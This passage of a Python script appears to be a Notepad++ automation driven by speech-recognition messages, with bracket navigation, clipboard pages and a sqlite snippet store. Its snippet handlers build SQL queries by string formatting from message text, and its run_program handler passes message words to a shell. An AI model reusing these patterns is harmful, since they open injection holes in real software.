"+str(type)+"\n\n"); cstack = []; # container stack wdw_size = 500; # window size wdw = ""; wdw_i = 0; cpos = p; if(p != -1): if(type == 0): # Move cursor to just inside the container. ed.gotoPos(p+1); elif(type == 1): nlf = False; # Move cursor to first line after bracket... 
cpos = p+1 while(cpos < tlen): if(wdw_i >= len(wdw)): rem = tlen - cpos; tws = wdw_size; if(rem < tws): tws = rem; wdw = Editor.getTextRange(editor,cpos,cpos+tws); wdw_i = 0; c = wdw[wdw_i]; wdw_i += 1; if((nlf) and not((c == " ")or(c == "\t"))): #Console.write(console,"nlf: [pos: "+str(cpos)+"] ("+str(ord(c))+") "+str(c)+"\n\n"); break; if(c == "\n"): nlf = True; if(c == targ): cstack.append(targ); elif(c == targ2): if targ in cstack: cstack.remove(targ); else: break; cpos += 1; if((cpos == tlen) or nlf): #Console.write(console,"goto: [pos: "+str(cpos)+"]\n\n"); ed.gotoPos(cpos); elif(type == 2): # Find last line after open container. cpos = p+1 tln = p+1; #Console.write(console,"targs: "+targ+" "+targ2+"\n\n"); while(cpos < tlen): if(wdw_i >= len(wdw)): rem = tlen - cpos; tws = wdw_size; if(rem < tws): tws = rem; wdw = Editor.getTextRange(editor,cpos,cpos+tws); wdw_i = 0; c = wdw[wdw_i]; wdw_i += 1; if(c == "\n"): tln = cpos; #Console.write(console,"tln: [pos: "+str(cpos)+"] ("+str(ord(c))+") "+str(c)+"\n\n"); if(c == targ): cstack.append(targ); elif(c == targ2): if targ in cstack: cstack.remove(targ); else: break; cpos += 1; if(cpos != tlen): #Console.write(console,"goto: [pos: "+str(cpos)+"]\n\n"); ed.gotoPos(tln); elif(type == 3): # Goto just inside closing container symbol. 
cpos = p+1 while(cpos < tlen): if(wdw_i >= len(wdw)): rem = tlen - cpos; tws = wdw_size; if(rem < tws): tws = rem; wdw = Editor.getTextRange(editor,cpos,cpos+tws); wdw_i = 0; c = wdw[wdw_i]; wdw_i += 1; if(c == targ): cstack.append(targ); elif(c == targ2): if targ in cstack: cstack.remove(targ); else: break; cpos += 1; if(cpos != tlen): ed.gotoPos(cpos); def paren_nav_left(x=1,type=0): container_nav(x,type,0,"(",")"); action_map["paren_nav_left"] = paren_nav_left; def paren_nav_right(x=1,type=0): container_nav(x,type,1,"(",")"); action_map["paren_nav_right"] = paren_nav_right; def square_nav_left(x=1,type=0): container_nav(x,type,0,"[","]"); action_map["square_nav_left"] = square_nav_left; def square_nav_right(x=1,type=0): container_nav(x,type,1,"[","]"); action_map["square_nav_right"] = square_nav_right; def curly_nav_left(x=1,type=0): container_nav(x,type,0,"{","}"); action_map["curly_nav_left"] = curly_nav_left; def curly_nav_right(x=1,type=0): container_nav(x,type,1,"{","}"); action_map["curly_nav_right"] = curly_nav_right; def angle_nav_left(x=1,type=0): container_nav(x,type,0,"<",">"); action_map["angle_nav_left"] = angle_nav_left; def angle_nav_right(x=1,type=0): container_nav(x,type,1,"<",">"); action_map["angle_nav_right"] = angle_nav_right; def save_source_file(x=1): global ed; Notepad.menuCommand(notepad,41006); action_map["save_source_file"] = save_source_file; def s_cut(x=1): global ed; global icb_max; global cb_buff; global cb_page; global cb_list_flag; global internal_cb; global serv_path; ss = Editor.getSelectionStart(editor); se = Editor.getSelectionEnd(editor); txt = Editor.getTextRange(editor,ss,se); internal_cb[cb_buff] = txt; set_cb(internal_cb[cb_buff]); # Save to sqlite3 db. 
try: with open(serv_path+"\\clipboard\\buffer.data","w+") as f: f.write(txt); f.flush(); except: pass; sub = subprocess.Popen(["python","-u",serv_path+"\\clipboard\\cb_client.py",":copy",str(cb_page),":buffer",str(cb_buff+1)],shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.STDOUT); try: raw = sub.communicate()[0]; Console.write(console,"copy: [page: "+str(cb_page)+" buffer: "+str(cb_buff+1)+"] "+raw+"\n"); except: pass; clipboard_list(cb_list_flag,1); sss = ed.getSelectionStart(); sse = ed.getSelectionEnd(); if(sss != sse): ed.deleteBack(); action_map["cut"] = s_cut; def s_copy(x=1): global ed; global icb_max; global cb_buff; global cb_page; global cb_list_flag; global internal_cb; global serv_path; ss = Editor.getSelectionStart(editor); se = Editor.getSelectionEnd(editor); txt = Editor.getTextRange(editor,ss,se); internal_cb[cb_buff] = txt; set_cb(internal_cb[cb_buff]); # Save to sqlite3 db. try: with open(serv_path+"\\clipboard\\buffer.data","w+") as f: f.write(txt); f.flush(); except: pass; sub = subprocess.Popen(["python","-u",serv_path+"\\clipboard\\cb_client.py",":copy",str(cb_page),":buffer",str(cb_buff+1)],shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.STDOUT); try: raw = sub.communicate()[0]; Console.write(console,"copy: [page: "+str(cb_page)+" buffer: "+str(cb_buff+1)+"] "+raw+"\n"); except: pass; clipboard_list(cb_list_flag,1); action_map["copy"] = s_copy; def s_paste(x=1): global ed; global icb_max; global cb_buff; global internal_cb; sss = ed.getSelectionStart(); sse = ed.getSelectionEnd(); if(sss != sse): ed.deleteBack(); ed.addText(internal_cb[cb_buff]); action_map["paste"] = s_paste; def clone(x=1): global ed; global icb_max; global cb_buff; global internal_cb; ss = Editor.getSelectionStart(editor); se = Editor.getSelectionEnd(editor); txt = Editor.getTextRange(editor,ss,se); ed.lineEnd(); ed.addText("\n%s" % txt); action_map["clone"] = clone; def clipboard_list(x=-1,y=0): global ed; global 
icb_max; global cb_buff; global internal_cb; global serv_path; global cb_list_flag; cb_list_flag = x; tfn = serv_path+"\\clipboard\\clipboard.ini" txt = ""; if(x == -1): for i in range(0,icb_max): p = " "; if(i == cb_buff): p = "[ACTIVE]"; txt = "%s%s" % (txt,"\n# ======================================"); txt = "%s%s%s%s%s" % (txt,"\n# ",p," BUFFER ",str(i+1)); txt = "%s%s" % (txt,"\n# ======================================\n"); txt = "%s%s\n" % (txt,internal_cb[i]); else: i = cb_buff; y = -1; try: y = int(x) - 1; except: pass; if((y >= 0) and (y < icb_max)): i = y; txt = "%s%s" % (txt,"\n# ======================================"); txt = "%s%s%s%s" % (txt,"\n# "," BUFFER ",str(i+1)); txt = "%s%s" % (txt,"\n# ======================================\n"); txt = "%s%s\n" % (txt,internal_cb[i]); try: with open(tfn,"w+") as f: f.write(txt.replace("\r", "")); f.flush(); except: pass; # Notepad.menuCommand(notepad,44072); # switch views. #Console.write(console,txt); #print tfn; fl = Notepad.getFiles(notepad); efl = []; efd = {}; if(x == 0): for f in fl: efl.append(f[0]); efd[f[0]] = f[1]; if(tfn in efl): cbid = Notepad.getCurrentBufferID(notepad); Notepad.activateBufferID(notepad,efd[tfn]); Notepad.close(notepad); Notepad.activateBufferID(notepad,cbid); try: with open(tfn,"w+") as f: f.write(""); f.flush(); except: pass; time.sleep(0.1); else: cbid = Notepad.getCurrentBufferID(notepad); vbid = None; fl = Notepad.getFiles(notepad); efl = []; efd = {}; for f in fl: efl.append(f[0]); efd[f[0]] = f[1]; if(tfn not in efl): if(y == 0): Notepad.open(notepad,tfn); Notepad.menuCommand(notepad,10001); Notepad.activateBufferID(notepad,cbid); else: if(y != 0): Notepad.menuCommand(notepad,44072); # switch views. 
vbid = Notepad.getCurrentBufferID(notepad); if(vbid != efd[tfn]): Notepad.activateBufferID(notepad,efd[tfn]); else: Notepad.activateBufferID(notepad,efd[tfn]); ed.setText(txt); Notepad.menuCommand(notepad,41006); if(y != 0): if(vbid != efd[tfn]): Notepad.activateBufferID(notepad,vbid); Notepad.activateBufferID(notepad,cbid); action_map["clipboard_list"] = clipboard_list; def clipboard_up(x=1): global ed; global icb_max; global cb_buff; global cb_page; global cb_page_bmap; global cb_list_flag; global internal_cb; if((cb_buff - 1) < 0): if((icb_max - 1) < 0): cb_buff = 0; set_cb(internal_cb[cb_buff]); else: cb_buff = icb_max - 1; set_cb(internal_cb[cb_buff]); else: cb_buff -= 1; set_cb(internal_cb[cb_buff]); # Save updated position to sqlite3 db. cb_page_bmap[cb_page][3] = cb_buff + 1; sub = subprocess.Popen(["python","-u",serv_path+"\\clipboard\\cb_client.py",":activebuffid",str(cb_page),":buffer",str(cb_buff+1)],shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.STDOUT); try: raw = sub.communicate()[0]; Console.write(console,"buffer position update: [page: "+str(cb_page)+" buffer: "+str(cb_buff+1)+"] "+raw+"\n"); except: pass; clipboard_list(cb_list_flag,1); action_map["clipboard_up"] = clipboard_up; def clipboard_down(x=1): global ed; global icb_max; global cb_buff; global cb_page; global cb_page_bmap; global cb_list_flag; global internal_cb; if((cb_buff + 1) >= icb_max): cb_buff = 0; set_cb(internal_cb[cb_buff]); else: cb_buff += 1; set_cb(internal_cb[cb_buff]); # Save updated position to sqlite3 db. 
cb_page_bmap[cb_page][3] = cb_buff + 1; sub = subprocess.Popen(["python","-u",serv_path+"\\clipboard\\cb_client.py",":activebuffid",str(cb_page),":buffer",str(cb_buff+1)],shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.STDOUT); try: raw = sub.communicate()[0]; Console.write(console,"buffer position update: [page: "+str(cb_page)+" buffer: "+str(cb_buff+1)+"] "+raw+"\n"); except: pass; clipboard_list(cb_list_flag,1); action_map["clipboard_down"] = clipboard_down; def clipboard_select(x=1): global ed; global icb_max; global cb_buff; global cb_page; global cb_page_bmap; global cb_list_flag; global internal_cb; try: y = int(x) - 1; if((y > 0) and (y < icb_max)): cb_buff = y; set_cb(internal_cb[cb_buff]); except: pass; # Save updated position to sqlite3 db. cb_page_bmap[cb_page][3] = cb_buff + 1; sub = subprocess.Popen(["python","-u",serv_path+"\\clipboard\\cb_client.py",":activebuffid",str(cb_page),":buffer",str(cb_buff+1)],shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.STDOUT); try: raw = sub.communicate()[0]; Console.write(console,"buffer position update: [page: "+str(cb_page)+" buffer: "+str(cb_buff+1)+"] "+raw+"\n"); except: pass; clipboard_list(cb_list_flag,1); action_map["clipboard_select"] = clipboard_select; def clipboard_auto(x=-1): global ed; global icb_max; global cb_buff; global internal_cb; global cb_page_auto_detect; if(x == 1): cb_page_auto_detect = True; with open(serv_path+"\\clipboard\\autopage.ini","w+") as f: f.write("1"); f.flush(); elif(x == 0): cb_page_auto_detect = False; with open(serv_path+"\\clipboard\\autopage.ini","w+") as f: f.write("0"); f.flush(); action_map["clipboard_auto"] = clipboard_auto; def clipboard_page_list(x=1,y=0): global ed; global icb_max; global cb_buff; global internal_cb; global serv_path; global cb_page_bmap; tfn = serv_path+"\\clipboard\\clipboard_page.ini" txt = ""; for k,v in cb_page_bmap.iteritems(): p = " "; if(k == cb_page): p = "[ACTIVE]"; txt = "%s%s%s = %s\n" 
% (txt,p,k,v[2]); try: with open(tfn,"w+") as f: f.write(txt.replace("\r", "")); f.flush(); except: pass; #Console.write(console,txt); #print tfn; if(x != 1): fl = Notepad.getFiles(notepad); efl = []; efd = {}; for f in fl: efl.append(f[0]); efd[f[0]] = f[1]; if(tfn in efl): cbid = Notepad.getCurrentBufferID(notepad); Notepad.activateBufferID(notepad,efd[tfn]); Notepad.close(notepad); Notepad.activateBufferID(notepad,cbid); try: with open(tfn,"w+") as f: f.write(""); f.flush(); except: pass; time.sleep(0.1); else: cbid = Notepad.getCurrentBufferID(notepad); vbid = None; fl = Notepad.getFiles(notepad); efl = []; efd = {}; for f in fl: efl.append(f[0]); efd[f[0]] = f[1]; if(tfn not in efl): if(y == 0): Notepad.open(notepad,tfn); Notepad.menuCommand(notepad,10001); Notepad.activateBufferID(notepad,cbid); else: if(y != 0): Notepad.menuCommand(notepad,44072); # switch views. vbid = Notepad.getCurrentBufferID(notepad); if(vbid != efd[tfn]): Notepad.activateBufferID(notepad,efd[tfn]); else: Notepad.activateBufferID(notepad,efd[tfn]); ed.setText(txt); Notepad.menuCommand(notepad,41006); if(y != 0): if(vbid != efd[tfn]): Notepad.activateBufferID(notepad,vbid); Notepad.activateBufferID(notepad,cbid); action_map["clipboard_page_list"] = clipboard_page_list; def inject_doctype(x=-1): global ed; if(x == 1): ed.addText('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">'); elif(x == 2): ed.addText('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">'); action_map["inject_doctype"] = inject_doctype; # ACTIONS END HERE # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 
def snippet_display_name_list(txt): global ed; global serv_path; filename = serv_path+"\\snippets\\snippet_page.ini" with open(filename,"w+") as file_stream: file_stream.write(txt); file_stream.flush(); filelist = Notepad.getFiles(notepad); temp_filelist = []; temp_filemap = {}; for file_object in filelist: temp_filelist.append(file_object[0]); temp_filemap[file_object[0]] = file_object[1]; if(filename in temp_filelist): cbid = Notepad.getCurrentBufferID(notepad); Notepad.activateBufferID(notepad,temp_filemap[filename]); Notepad.close(notepad); Notepad.activateBufferID(notepad,cbid); time.sleep(0.1); else: cbid = Notepad.getCurrentBufferID(notepad); Notepad.open(notepad,filename); Notepad.menuCommand(notepad,10001); Notepad.activateBufferID(notepad,cbid); def navigate(nav_path): global ed; global action_map; ns = nav_path.split(","); for x in ns: m = x.split(":"); an = m[0]; rp = 1; if(len(m) > 1): try: rp = int(m[1]); except: rp = 1; if(an in action_map): action_map[an](rp); def cleaner(_raw): global esep; ssep = "###)))(((###"; rez = (False,None); raw = ""; rrr = _raw.split(esep); rrrl = len(rrr); if(rrrl < 2): return rez; es = ""; for i in range(0,rrrl - 1): x = rrr[i]; raw += es + x; es = esep; r = raw.split(ssep); rl = len(r); if(rl < 2): return rez; res = ""; sep = ""; for i in range(1,rl): res += sep + str(r[i]); sep = ssep; rez = (True,res); return rez; def format_props(p_raw): psep = "###>>><<<###"; ksep = "###((()))###"; ps = p_raw.split(psep); d = {}; for p in ps: kv = p.split(ksep); if((len(kv) < 2) or (kv[0] == "")): continue; d[kv[0]] = kv[1]; return d; def format_msg(data): global esep; rez = (None,None); dsep = "###<<<>>>###"; ssep = "###)))(((###"; r = data.split(dsep); msg = r[0]; rl = len(r); if((rl < 2)or(r[1] == "")): return (msg,{}); p_raw = r[1]; """ d = {}; ps = p_raw.split(psep); for p in ps: kv = p.split(ksep); if((len(kv) < 2) or (kv[0] == "")): continue; d[kv[0]] = kv[1]; """ rez = (msg,format_props(p_raw)); return rez; def 
check_dt_dups(): now = int(time.time()); max_diff = 2; # 2 seconds. fn = "E:\\usr\\nppserve\\npp_check.txt"; f = open(fn,"r+"); x = 0; xs = f.readline(); if(xs != ""): x = int(xs); f.close(); if((now - x) > max_diff): return True; return False; def mark_dt(): now = int(time.time()); fn = "E:\\usr\\nppserve\\npp_check.txt"; f = open(fn,"w+"); f.write(str(now)+"\n"); f.flush(); f.close(); def dragon_guard_thread(): global is_running; while(is_running): mark_dt(); time.sleep(0.5); msg_queue = []; def dragon_thread(): global ed; global is_running; global esep; global action_map; global msg_queue; global atom_list; global atom_map; global bm; global auto_lang; global serv_path; global esep; global icb_max; global cb_buff; global internal_cb; global cb_page_map; global cb_page_bmap; global cb_page_default; global cb_page; global cb_list_flag; global current_lang; global dm; if(not check_dt_dups()): is_running = False; return False; mem_re = re.compile("\|[^|]*\|"); connav_re = re.compile("\:rp[0-9]+"); #print "test point 2"; tmp = ""; ssep = "###)))(((###"; Thread(target=dragon_guard_thread).start(); while(is_running): time.sleep(0.05); mm = None; if(len(msg_queue) > 0): mm = msg_queue.pop(0) else: continue; msg = mm[0].replace(ssep,""); props = mm[1]; for k,v in props.iteritems(): props[k] = v.replace(esep,""); #print msg, props; cln = cur_line_num(ed); if(("type" not in props) or (props["type"] == "add_text")): indent = "inherit"; if("indent" in props): indent = props["indent"]; lines = msg.replace("\r","").split("\n"); prep = ""; tc = int(ed.getLineIndentation(cln)/4); if(indent != "inherit"): tc = 0; m = ""; tabs = "\t" * tc; sep = "\n%s" % tabs; for x in lines: m += prep + x; prep = sep; # Pre-navigation if("pre_nav" in props): navigate(props["pre_nav"]); ed.addText(m); # Post-navigation if("post_nav" in props): navigate(props["post_nav"]); elif("type" in props): mtype = props["type"]; if(mtype == "action"): m = msg.split(":"); an = m[0]; rp = 1; if(len(m) > 1): 
try: rp = int(m[1]); except: rp = 1; if(an in action_map): action_map[an](rp); elif(mtype == "memcomplete"): try: c_lang = current_lang; if(c_lang in dm): c_lang = dm[c_lang]; indent = "inherit"; if("indent" in props): indent = props["indent"]; lines = msg.replace("\r","").split("\n"); prep = ""; tc = int(ed.getLineIndentation(cln)/4); if(indent != "inherit"): tc = 0; m = ""; for x in lines: m += prep + x; prep = "\n" + ("\t" * tc); msg = m; #print msg; #Console.write(console,str(bm)+"\n\n\n\n---------\n\n\n"); buff_id = Notepad.getCurrentBufferID(notepad); memtype = [["var"]]; pre = msg[0]; if("memtype" in props): try: mtl = props["memtype"].split("|"); memtype = []; for mt in mtl: mtc = mt.split(","); mtsl = []; memtype.append(mtsl); for ms in mtc: try: n = ms.replace("\n","").replace("\r","").replace("\t","").replace(" ",""); mtsl.append(n); except: pass; pass; except: memtype = [["var"]]; t = msg; result = msg; tf = mem_re.search(t); tfl = []; while(tf != None): tfl.append(t[(tf.start()+1):(tf.end()-1)]); tf = mem_re.search(t,tf.end()+1); tfc = len(tfl); tmp = None; for mt in memtype: if(len(mt) == tfc): tmp = mt; break; memtype = tmp; if((memtype != None) and (tfc > 0)): for i in range(0,tfc): mt = memtype[i]; #Console.write(console,str(c_lang)+"\n\n\n-----\n\n"); #Console.write(console,str(bm[buff_id][c_lang])+"\n====\n\n"); al = []; bl = []; try: for ax in bm[buff_id][c_lang]["alias"][mt].iterkeys(): al.append(ax); bl.append(ax); except: pass; for ax in bm[buff_id][c_lang][mt]: if(ax not in bl): bl.append(ax); tm = tfl; m = tm[0]; z = get_closest_match(m,bl); if(z in al): z = bm[buff_id][c_lang]["alias"][mt][z]; tf = mem_re.search(result); result = "%s%s%s" % (result[0:tf.start()],z,result[tf.end():]); del al; del bl; else: result = get_closest_match(msg,bm[buff_id][c_lang][memtype[0]]); """ ts = t.split("|"); result = ""; if(len(ts) > 2): m = ts[1]; z = get_closest_match(m,bm[buff_id][atom_list[memtype]]); result = "%s%s%s" % (ts[0],z,ts[2]); #print 
"TESTING: ", result,"\n\n"; pre = ""; else: result = get_closest_match(msg,bm[buff_id][atom_list[memtype]]); """ #result = get_closest_match(msg,bm[buff_id][atom_list[memtype]]); #if((memtype == 0) and (pre == "$")): # result = "%s%s" % (pre,result); ed.addText(result); except: pass; elif(mtype == "run_program"): try: nosave = False; fn = serv_path + "\\run_code.bat"; cfn = Notepad.getCurrentFilename(notepad); plist = ["start", fn]; msg = msg.replace(":filename",cfn); if(msg.find(":nosave") != -1): nosave = True; msg = msg.replace(":nosave",""); if(not nosave): Notepad.menuCommand(notepad,41006); ms = msg.split(" "); for m in ms: if((m == None) or (m == "")): continue; plist.append(m); subprocess.Popen(plist, shell = True) except: pass; elif(mtype == "auto_language_detect"): try: res = -1; t = int(msg); #print "Auto lang: "+str(t); if(t == 1): res = t; auto_lang = True; elif(t == 0): rest = t auto_lang = False; if(t != -1): try: with open(serv_path+"\\grammar\\autolang.txt","w+") as f: f.write(str(res)); f.flush(); except: pass; except: pass; elif(mtype == "grammar_def"): #print "testing\n"; #tfn = serv_path+"\\__code_utility__"; tfn = serv_path+"\\grammar\\grammar.ini" #print tfn; fl = Notepad.getFiles(notepad); efl = []; efd = {}; for f in fl: efl.append(f[0]); efd[f[0]] = f[1]; if(tfn in efl): Notepad.activateBufferID(notepad,efd[tfn]); Notepad.close(notepad); time.sleep(0.1); else: cbid = Notepad.getCurrentBufferID(notepad); Notepad.open(notepad,tfn); Notepad.menuCommand(notepad,10001); Notepad.activateBufferID(notepad,cbid); elif(mtype == "container_navigation"): #print "testing\n"; #tfn = serv_path+"\\__code_utility__"; dir = 0; x = 1; cntype = 0; tf = msg.find(":right"); if(tf != -1): dir = 1; ts = msg.split(" "); #Console.write(console,"msg: "+str(msg)+"\n\n"); try: tstype = int(ts[len(ts)-2]); cntype = tstype; except: pass; #Console.write(console,"cntype: "+str(cntype)+" : "+str(ts)+"\n\n"); tf = msg.find(":paren"); if(tf != -1): if(dir == 0): 
paren_nav_left(x,cntype); else: paren_nav_right(x,cntype); continue; tf = msg.find(":square"); if(tf != -1): if(dir == 0): square_nav_left(x,cntype); else: square_nav_right(x,cntype); continue; tf = msg.find(":curly"); tf2 = msg.find(":bracket"); if((tf != -1)or(tf2 != -1)): if(dir == 0): curly_nav_left(x,cntype); else: curly_nav_right(x,cntype); continue; tf = msg.find(":angle"); if(tf != -1): if(dir == 0): angle_nav_left(x,cntype); else: angle_nav_right(x,cntype); continue; elif(mtype == "container_navigation_short"): #print "testing\n"; #tfn = serv_path+"\\__code_utility__"; st = "paren"; if ("subtype" in props): st = props["subtype"]; dir = 0; if ("direction" in props): try: nn = int(props["direction"]); dir = nn; except: pass; x = 1; cntype = 0; xl = connav_re.findall(msg); for y in xl: try: nn = int(y[3:]); x = nn; except: pass; break; ts = msg.split(" "); #Console.write(console,"ts: "+str(ts)+"\n\n"); try: tstype = int(ts[len(ts)-2]); cntype = tstype; except: try: tstype = int(ts[len(ts)-1]); cntype = tstype; except: pass; #Console.write(console,"msg: "+msg+" cntype: "+str(cntype)+" : "+str(st)+" x:"+str(x)+"\n\n"); if(st == "paren"): if(dir == 0): paren_nav_left(x,cntype); else: paren_nav_right(x,cntype); continue; if(st == "square"): if(dir == 0): square_nav_left(x,cntype); else: square_nav_right(x,cntype); continue; if(st == "curly"): if(dir == 0): curly_nav_left(x,cntype); else: curly_nav_right(x,cntype); continue; if(st == "angle"): if(dir == 0): angle_nav_left(x,cntype); else: angle_nav_right(x,cntype); continue; elif(mtype == "clipboard_page_manage"): #print "testing\n"; #tfn = serv_path+"\\__code_utility__"; #tfn = serv_path+"\\clipboard\\clipboard_page.ini" #print tfn; fn = Notepad.getCurrentFilename(notepad); tfn = ""; ms = msg.replace("\r","").replace("\n","").split(" "); try: m = ms[len(ms)-1]; if(m == ""): m = ms[len(ms)-2]; if((m[0] == ":") or (m == "")): continue; tfn = m; except: pass; tf = msg.find(":add"); if(tf != -1): try: kl = []; for k 
in cb_page_bmap.iterkeys(): kl.append(k); res = get_closest_match(tfn,kl); if(res != None): mstr = jellyfish.jaro_distance(tfn,res); if(mstr >= 0.7): Console.write(console,"Clipboard-Page NOT ADDED: "+tfn+" Match strength ["+str(mstr)+"] too strong to existing page: "+res+"\n"); continue; tdir = get_dirname(fn); if(tdir == ""): Console.write(console,"Clipboard-Page NOT ADDED. No directory??? -- "+fn+":"+tdir+"\n"); continue; tdf = None; for k,v in cb_page_bmap.iteritems(): if(v[2] == tdir): tdf = k; break; if(tdf != None): Console.write(console,"Clipboard-Page ["+str(tfn)+"] NOT ADDED. Directory already has a page: -- "+k+":"+tdir+"\n"); continue; # Issue add command to the database via the client script. sub = subprocess.Popen(["python","-u",serv_path+"\\clipboard\\cb_client.py",":add",str(tfn),":dir",str(tdir)],shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.STDOUT); try: sr = sub.communicate()[0]; if(sr.replace("\n","").replace("\r","") != "Done."): Console.write(console,"Clipboard-Page NOT ADDED: -- CB_CLIENT.PY SCRIPT ERROR --\n"+sr); continue; except: Console.write(console,"Clipboard-Page NOT ADDED: == CB_CLIENT.PY SCRIPT ERROR =="); continue; Console.write(console,"Clipboard-Page Added: "+tfn+"\n"); cb_page = tfn; cb_page_bmap[tfn] = [None,icb_max,tdir,1]; cb_page_map[tfn] = [""] * icb_max; m = cb_page_bmap[tfn]; internal_cb = cb_page_map[m[0]]; cb_page = m[0]; cb_buff = m[3] - 1; clipboard_list(cb_list_flag,1); clipboard_page_list(1,1); except: pass; tf = msg.find(":delete"); if(tf != -1): try: kl = []; for k in cb_page_bmap.iterkeys(): kl.append(k); res = get_closest_match(tfn,kl); if((res == None) or (res == "default")): Console.write(console,"No match.\n"); continue; Console.write(console,"Clipboard-Page Deleted: "+res+"\n"); if(cb_page == res): m = cb_page_bmap[cb_page_default]; internal_cb = cb_page_map[m[0]]; cb_page = m[0]; cb_buff = m[3] - 1; m = cb_page_bmap[res]; # Delete local data for the page. 
cb_page_bmap.pop(res); cb_page_map.pop(res); # Issue delete command to the database via the client script. sub = subprocess.Popen(["python","-u",serv_path+"\\clipboard\\cb_client.py",":delete",str(res)],shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.STDOUT); try: raw = sub.communicate()[0]; Console.write(console,"Raw: "+str(raw)+"\n"); except: pass; clipboard_list(cb_list_flag,1); clipboard_page_list(1,1); except: pass; tf = msg.find(":goto"); if(tf != -1): try: kl = []; for k in cb_page_bmap.iterkeys(): kl.append(k); res = get_closest_match(tfn,kl); if(res == None): Console.write(console,"No match."); continue; Console.write(console,"Clipboard-Page Selected: "+res+"\n"); m = cb_page_bmap[res]; internal_cb = cb_page_map[res]; cb_page = res; cb_buff = m[3] - 1; clipboard_list(cb_list_flag,1); clipboard_page_list(1,1); except: pass; elif(mtype == "add_snippet"): selection_start = ed.getSelectionStart(); selection_end = ed.getSelectionEnd(); if(selection_start == selection_end): continue; # makes no sense to add an empty snippet. txt = Editor.getTextRange(editor, selection_start, selection_end); txt = txt.replace("'","''"); snippet_db_path = "%s\\snippets\\db\\snippets.sqlite3" % serv_path; connection = sqlite3.connect(snippet_db_path); cursor = connection.cursor(); snippet_context = current_lang; msg_split = msg.split("~~~"); snippet_name = msg_split[0].replace("_"," ").replace("/","").replace("\\","").replace(":",""); has_snippet_context = (len(msg_split) > 1) and (msg_split[1].replace(" ","").replace("\t","").replace("\n","") != ""); possible_context_list = ["wildcard"]; for context in dm.iterkeys(): possible_context_list.append(context); if(has_snippet_context): snippet_context = msg_split[1]; # match it to one of the context options. 
closest_context = get_closest_match(snippet_context, possible_context_list); # ensure this snippet name isn't taken for this context sql = "select name from snippet where (context = '%s' or '%s' = 'wildcard') and name = '%s'" % (snippet_context, snippet_context, snippet_name); cursor.execute(sql); rows = cursor.fetchall(); snippet_names = [] for fetched_snippet_name in rows: if((fetched_snippet_name[0] != None) and (fetched_snippet_name[0] != "")): snippet_names.append(fetched_snippet_name[0].lower()); if(len(snippet_names) > 0): continue; # insert the snippet. sql = "insert into snippet (name, content, context) values ('%s', '%s', '%s')" % (snippet_name, txt, snippet_context); cursor.execute(sql); connection.commit(); connection.close(); Console.write(console,"ADD-SNIPPET: %s\n" % snippet_name); elif(mtype == "inject_snippet"): selection_start = ed.getSelectionStart(); selection_end = ed.getSelectionEnd(); if(selection_start != selection_end): ed.deleteBack(); snippet_db_path = "%s\\snippets\\db\\snippets.sqlite3" % serv_path; connection = sqlite3.connect(snippet_db_path); cursor = connection.cursor(); msg_split = msg.split("~~~"); snippet_name = msg_split[0].replace("_"," ").replace("/","").replace("\\","").replace(":",""); snippet_context = current_lang; has_snippet_context = (len(msg_split) > 1) and (msg_split[1].replace(" ","").replace("\t","").replace("\n","") != ""); possible_context_list = ["wildcard"]; for context in dm.iterkeys(): possible_context_list.append(context); if(has_snippet_context): snippet_context = msg_split[1]; # match it to one of the context options. 
closest_context = get_closest_match(snippet_context, possible_context_list); if(snippet_context == None): snippet_context = current_lang; sql = "select name from snippet where (context = '%s' or '%s' = 'wildcard')" % (snippet_context, snippet_context); cursor.execute(sql); rows = cursor.fetchall(); snippet_names = []; for fetched_snippet_name in rows: if((fetched_snippet_name[0] != None) and (fetched_snippet_name[0] != "")): snippet_names.append(str(fetched_snippet_name[0]).lower()); snippet_name = get_closest_match(snippet_name, snippet_names); if((snippet_name == None) or (snippet_name == "")): continue; sql = "select content from snippet where (context = '%s' or '%s' = 'wildcard') and name = '%s' limit 1" % (snippet_context, snippet_context, snippet_name); cursor.execute(sql); snippet = ""; try: snippet = cursor.fetchone()[0]; except: continue; connection.close(); Console.write(console,"INJECT-SNIPPET: %s\n" % snippet_name); if(snippet == None): continue; cln = cur_line_num(ed); lines = snippet.replace("\r","").split("\n"); prep = ""; tc = int(ed.getLineIndentation(cln)/4); m = ""; tabs = "\t" * tc sep = "\n%s" % tabs for x in lines: m += prep + x; prep = sep; snippet = m; ed.addText(snippet); elif(mtype == "display_snippets"): snippet_db_path = "%s\\snippets\\db\\snippets.sqlite3" % serv_path; connection = sqlite3.connect(snippet_db_path); cursor = connection.cursor(); snippet_context = current_lang; has_snippet_context = msg.replace(" ","").replace("\t","").replace("\n","") != ""; possible_context_list = ["wildcard"]; for context in dm.iterkeys(): possible_context_list.append(context); if(has_snippet_context): snippet_context = msg; # match it to one of the context options. 
